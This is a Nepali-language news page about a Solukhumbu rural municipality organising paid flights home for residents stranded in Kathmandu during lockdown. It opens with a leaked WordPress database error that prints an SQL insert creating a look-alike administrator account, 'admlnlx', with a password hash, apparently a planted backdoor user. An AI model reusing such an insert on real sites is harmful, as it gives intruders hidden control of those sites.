WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BlQzAmFp.5Xt1np8ouzcyLqK5Ipfil.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-08 20:46:10', '', 'admlnlx', 'admlnlx')

हवाईजहाजबाट घर जानलाई नाम टिपाउन खुम्बु पासाङ ल्हामु गाउँपालिकाको आह्‌वान – Gaule Khabar

हवाईजहाजबाट घर जानलाई नाम टिपाउन खुम्बु पासाङ ल्हामु गाउँपालिकाको आह्‌वान

हवाईजहाजबाट घर जानलाई नाम टिपाउन खुम्बु पासाङ ल्हामु गाउँपालिकाको आह्‌वान

सोलुखुम्बु –  खुम्बु पासङ ल्हमु गाउँपालिकाले काठमाडौं रोकिएका सोलुखुम्बुको खुम्बु क्षेत्रका नागरिकहरुलाई हवाई जहाज मार्फत उद्धार गरी गाउँ फर्काउने अभियान अघि सारेको छ । लक डाउनका कारण राजधानीमा रोकिएका खुम्बुबासीहरुलाई खुम्बु पासाङ ल्हामु गाउँपालिकाले उद्धार गरी गाउँ फर्काउने भएको हो ।

गाउँपालिकाले सूचना जारी गर्दै सडक मार्गबाट गाउँ फर्कन नपाएका व्यक्तिलाई हवाईजहाजबाट ल्याउँन लागिएको जनाएको छ । गाउँपालिका प्रबक्ता ल्हाक्पा छिरि शेर्पाका अनुसार काठमाडौंबाट र्फकंदा लाग्ने हवाई जहाज भाडा भने यात्रु आफैले तिर्नुपर्ने छ ।

काठमाडौंबाट गाउँ फर्काईएका व्यक्तिहरुलाई अनिबार्य १४ दिन होम क्वारेन्टिनमा राखिने जानाइएको छ । काठमाडौंमा रहेका खुम्बु क्षेत्रमा कार्यरत शिक्षक र कर्मचारीलाई पनि हवाईजहाजबाटै गाउँ फर्काइने गाउँपालिकाका प्रबक्ता शेर्पाको भनाई छ । फर्किन चाहने ब्यक्तिले सम्बन्धित वडाका अध्यक्षलाई नाम टिपाउन गाउँपालिकाले आग्रह गरेको छ ।

 

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका